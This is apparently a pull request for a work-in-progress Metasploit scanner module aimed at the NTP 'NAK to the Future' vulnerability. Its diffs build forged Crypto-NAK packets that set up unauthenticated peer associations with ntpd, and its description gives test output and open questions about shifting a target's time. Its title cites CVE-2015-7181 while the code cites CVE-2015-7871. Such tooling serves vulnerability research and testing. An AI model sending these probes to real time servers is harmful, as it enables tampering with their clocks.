### PR TITLE
Module for NTP 'NAK to the Future' (CVE-2015-7181)

### DIFF
--- a/lib/rex/proto/ntp/modes.rb
+++ b/lib/rex/proto/ntp/modes.rb
@@ -92,15 +92,10 @@ module NTP
     end
   end
 
-  class NTPCryptoNAK < BitStruct
-    #    0                   1                   2                   3
-    #    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
-    #   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
-    #   |LI | VN  | mode|    Stratum    |      Poll     |   Precision   |
-    #   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+  class NTPSymmetric < BitStruct
     unsigned :li, 2,  default: 0
     unsigned :version, 3,  default: 3
-    unsigned :mode, 3,  default: 1
+    unsigned :mode, 3,  default: 0
     unsigned :stratum, 8,  default: 0
     unsigned :poll, 8,  default: 0
     unsigned :precision, 8,  default: 0

--- a/lib/rex/proto/ntp/modes.rb
+++ b/lib/rex/proto/ntp/modes.rb
@@ -92,6 +92,28 @@ module NTP
     end
   end
 
+  class NTPCryptoNAK < BitStruct
+    #    0                   1                   2                   3
+    #    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+    #   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    #   |LI | VN  | mode|    Stratum    |      Poll     |   Precision   |
+    #   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    unsigned :li, 2,  default: 0
+    unsigned :version, 3,  default: 3
+    unsigned :mode, 3,  default: 1
+    unsigned :stratum, 8,  default: 0
+    unsigned :poll, 8,  default: 0
+    unsigned :precision, 8,  default: 0
+    unsigned :root_delay, 32,  default: 0
+    unsigned :root_dispersion, 32,  default: 0
+    unsigned :reference_id, 32,  default: 0
+    unsigned :reference_timestamp, 64,  default: 0
+    unsigned :origin_timestamp, 64,  default: 0
+    unsigned :receive_timestamp, 64,  default: 0
+    unsigned :transmit_timestamp, 64,  default: 0
+    rest :payload
+  end
+
   def self.ntp_control(version, operation, payload = nil)
     n = NTPControl.new
     n.version = version

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -25,6 +25,8 @@ class Metasploit3 < Msf::Auxiliary
       'References'     =>
         [
           [ 'URL', 'http://talosintel.com/reports/TALOS-2015-0069/' ],
+          [ 'URL', 'http://www.cisco.com/c/en/us/support/docs/availability/high-availability/19643-ntpm.html' ],
+          [ 'URL', 'http://support.ntp.org/bin/view/Main/NtpBug2941' ],
           [ 'CVE', '2015-7871' ]
         ]
       )

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
     connect_udp
 
     # pick a random 64-bit timestamp
-    canary_timestamp = rand(2**32..2**64-1)
+    canary_timestamp = rand((2**32)..((2**64) - 1))
     probe = build_crypto_nak(canary_timestamp)
     udp_sock.put(probe)
 
@@ -103,10 +103,10 @@ class Metasploit3 < Msf::Auxiliary
       end
     end
 
-    return Exploit::CheckCode::Unknown
+    Exploit::CheckCode::Unknown
   end
 
-  def run_host(ip)
-    fail_with(Failure::Unknown, 'Not yet implemented')
+  def run_host(_ip)
+    check
   end
 end

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -1,0 +1,65 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::Udp
+  include Msf::Auxiliary::UDPScanner
+  include Msf::Auxiliary::NTP
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'NTP "NAK To the Future"',
+      'Description'    => %q(
+        Fill.  This.  In.
+      ),
+      'Author'         =>
+        [
+          'Jon Hart <jon_hart[at]rapid7.com>' # original metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'http://talosintel.com/reports/TALOS-2015-0069/' ],
+          [ 'CVE', '2015-7871' ]
+        ]
+      )
+    )
+
+    register_options(
+    [
+      OptInt.new('OFFSET', [true, "Offset from local time, in seconds", 300]),
+    ], self.class)
+  end
+
+  def scanner_process(data, shost, _sport)
+    @results[shost] ||= []
+    @results[shost] << data
+  end
+
+  def scan_host(ip)
+    probe = Rex::Proto::NTP::NTPCryptoNAK.new
+    probe.stratum = 1
+    probe.poll = 10
+    now = Time.now
+    ts = ((now.to_i + 2208988800 + datastore['OFFSET']) << 32) + now.nsec
+    probe.reference_timestamp = ts
+    probe.origin_timestamp = ts
+    probe.receive_timestamp = ts
+    probe.transmit_timestamp = ts
+    probe.payload = "\x00\x00\x00\x00"
+    scanner_send(probe, ip, datastore['RPORT'])
+  end
+
+  def scanner_prescan(batch)
+    @results = {}
+  end
+
+  def scanner_postscan(_batch)
+    # do something here...
+  end
+end

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
     # pick a random 64-bit timestamp
     canary_timestamp = rand(2**32..2**64-1)
     probe = build_crypto_nak(canary_timestamp)
-    udp_sock.puts(probe)
+    udp_sock.put(probe)
 
     expected_length = probe.length - probe.payload.length
     response = udp_sock.timed_read(expected_length)

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -23,11 +23,12 @@ class Metasploit3 < Msf::Auxiliary
           sends these Crypto-NAK packets in order to establish an association
           between the target ntpd instance and the attacking client.  The end goal
           is to cause ntpd to declare the legitimate peers "false tickers" and
-          choose the attacking client(s) as the preferred peer(s), allowing
+          choose the attacking clients as the preferred peers, allowing
           these peers to control time.
          ),
         'Author'         =>
           [
+            'Matthew Van Gundy of Cisco ASIG', # vulnerability discovery
             'Jon Hart <jon_hart[at]rapid7.com>' # original metasploit module
           ],
         'License'        => MSF_LICENSE,

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -46,13 +46,21 @@ class Metasploit3 < Msf::Auxiliary
     probe.stratum = 1
     probe.poll = 10
     now = Time.now
+    # compute the timestamp.  NTP stores a timestamp as 64-bit unsigned
+    # integer, the high 32-bits representing the number of seconds since era
+    # epoch and the low 32-bits representing the fraction of a second.  The era
+    # epoch in this case is Jan 1 1900, so we must add the number of seconds
+    # between then and the ruby era epoch, Jan 1 1970, which is 2208988800
     ts = ((now.to_i + 2208988800 + datastore['OFFSET']) << 32) + now.nsec
+    # TODO: use different values for each?
     probe.reference_timestamp = ts
     probe.origin_timestamp = ts
     probe.receive_timestamp = ts
     probe.transmit_timestamp = ts
+    # key-id 0
     probe.payload = "\x00\x00\x00\x00"
     scanner_send(probe, ip, datastore['RPORT'])
+    # TODO: whatever is next in order to let us win the race against the other peers
   end
 
   def scanner_prescan(batch)

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -37,13 +37,7 @@ class Metasploit3 < Msf::Auxiliary
             [ 'URL', 'http://www.cisco.com/c/en/us/support/docs/availability/high-availability/19643-ntpm.html' ],
             [ 'URL', 'http://support.ntp.org/bin/view/Main/NtpBug2941' ],
             [ 'CVE', '2015-7871' ]
-          ],
-        'Actions'        =>
-          [
-            ['CHECK', { 'Description' => 'Check for NTP NAK to the future' }],
-            ['SET', { 'Description' => 'Set the time' }]
-          ],
-        'DefaultAction'  => 'CHECK'
+          ]
       )
     )
 
@@ -109,5 +103,9 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     return Exploit::CheckCode::Unknown
+  end
+
+  def run_host(ip)
+    fail_with(Failure::Unknown, 'Not yet implemented')
   end
 end

--- a/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
+++ b/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb
@@ -12,30 +12,39 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Auxiliary::NTP
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'NTP "NAK To the Future"',
-      'Description'    => %q(
-        Fill.  This.  In.
-      ),
-      'Author'         =>
-        [
-          'Jon Hart <jon_hart[at]rapid7.com>' # original metasploit module
-        ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'URL', 'http://talosintel.com/reports/TALOS-2015-0069/' ],
-          [ 'URL', 'http://www.cisco.com/c/en/us/support/docs/availability/high-availability/19643-ntpm.html' ],
-          [ 'URL', 'http://support.ntp.org/bin/view/Main/NtpBug2941' ],
-          [ 'CVE', '2015-7871' ]
-        ]
+    super(
+      update_info(
+        info,
+        'Name'           => 'NTP "NAK to the Future"',
+        'Description'    => %q(
+          Crypto-NAK packets can be used to cause ntpd to accept time from
+          unauthenticated ephemeral symmetric peers by bypassing the
+          authentication required to mobilize peer associations.  This module
+          sends these Crypto-NAK packets in order to establish an association
+          between the target ntpd instance and the attacking client.  The end goal
+          is to cause ntpd to declare the legitimate peers "false tickers" and
+          choose the attacking client(s) as the preferred peer(s), allowing
+          these peers to control time.
+         ),
+        'Author'         =>
+          [
+            'Jon Hart <jon_hart[at]rapid7.com>' # original metasploit module
+          ],
+        'License'        => MSF_LICENSE,
+        'References'     =>
+          [
+            [ 'URL', 'http://talosintel.com/reports/TALOS-2015-0069/' ],
+            [ 'URL', 'http://www.cisco.com/c/en/us/support/docs/availability/high-availability/19643-ntpm.html' ],
+            [ 'URL', 'http://support.ntp.org/bin/view/Main/NtpBug2941' ],
+            [ 'CVE', '2015-7871' ]
+          ]
       )
     )
 
     register_options(
-    [
-      OptInt.new('OFFSET', [true, "Offset from local time, in seconds", 300]),
-    ], self.class)
+      [
+        OptInt.new('OFFSET', [true, "Offset from local time, in seconds", 300])
+      ], self.class)
   end
 
   def scanner_process(data, shost, _sport)
@@ -63,13 +72,5 @@ class Metasploit3 < Msf::Auxiliary
     probe.payload = "\x00\x00\x00\x00"
     scanner_send(probe, ip, datastore['RPORT'])
     # TODO: whatever is next in order to let us win the race against the other peers
-  end
-
-  def scanner_prescan(batch)
-    @results = {}
-  end
-
-  def scanner_postscan(_batch)
-    # do something here...
   end
 end


### PR DESCRIPTION
http://talosintel.com/reports/TALOS-2015-0069/

This is a work-in-progress module for the above mentioned vulnerability that implements `check`.  `run`/variants is not implemented just yet as I'm not sure what the next steps are to drift the target's time.  I've tested this against a somewhat hardened NTP 4.2.7-p445 (vulnerable) and similarly hardened NTP 4.2.8-p4 (patched), and `check` properly identifies them as vulnerable and invulnerable, respectively.:

```
msf auxiliary(ntp_nak_to_the_future) > check
[*] 10.4.30.178:123 - The target appears to be vulnerable.  <---- 4.2.7-p445
[*] Checked 1 of 2 hosts (050% complete)
[*] 10.4.23.40:123 - Cannot reliably check exploitability. <---- 4.2.8-p4
```

I can also confirm that the association has been established on the vulnerable peer:

```
root@ntp-4-2-7-p445-noquery:~# ntpq -nc lpee 
     remote           refid      st t when poll reach   delay   offset  jitter
==============================================================================
+216.229.0.50    129.7.1.66       2 u   14   64  377   62.602    2.277  12.725
+96.44.154.34    96.44.142.5      3 u   15   64  377    1.839    0.662  13.957
 2001:1868:213:5 .INIT.          16 u    -   64    0    0.000    0.000   0.000
*208.75.88.4     69.36.224.15     2 u   17   64  377    2.007   -1.112  15.326
 172.16.10.120   .INIT.          16 S  137 1024    0    0.000    0.000   0.000
 172.16.10.120   .INIT.          16 S   94 1024    0    0.000    0.000   0.000
 172.16.10.120   .INIT.          16 S   39 1024    0    0.000    0.000   0.000
```

Also, the request/response packets that you'll see running this module are very similar to what you'll find in http://www.pcapr.net/view/user/2015/9/2/8/nak-to-the-future.pcap.html, interestingly posted 1+ month ahead of the publication of this vulnerability.

RIght now this implements `check` only so it is really only good for locating vulnerable endpoints rather than exploiting them.  I currently don't have time to work on implementing the exploitation part of this, but things I had been thinking about in that regard included:
- Can a single peer (the attacker) establish multiple associations on its own such that these multiple associations are eventually enough to declare the legit peers invalid?  IOW, are multiple attacking IPs necessary, or will one suffice?
- Does the reference ID matter in this attack?
- Do we need to respond to the symmetric _passive_ request (?) that is sent in response to our symmetric active probe?
